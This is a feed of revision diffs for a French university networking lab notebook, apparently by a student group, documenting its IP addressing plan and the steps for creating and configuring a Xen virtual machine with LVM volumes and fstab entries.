= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59667</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59667"/>
				<updated>2022-11-10T10:51:40Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
#  Disk device(s).&lt;br /&gt;
#&lt;br /&gt;
root        = '/dev/xvda2 ro'&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59664</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59664"/>
				<updated>2022-11-10T10:45:53Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Création de la VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/Kronenbourg.cfg :&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59663</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59663"/>
				<updated>2022-11-10T10:45:09Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Plan d’adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/Kronenbourg.cfg :&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Kronenbourg/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Kronenbourg/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Kronenbourg-home,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Kronenbourg-var,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59658</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59658"/>
				<updated>2022-11-10T10:31:05Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM ! @IPv4 MV  routée !! Nom de domaine&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
mmm&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	</feed>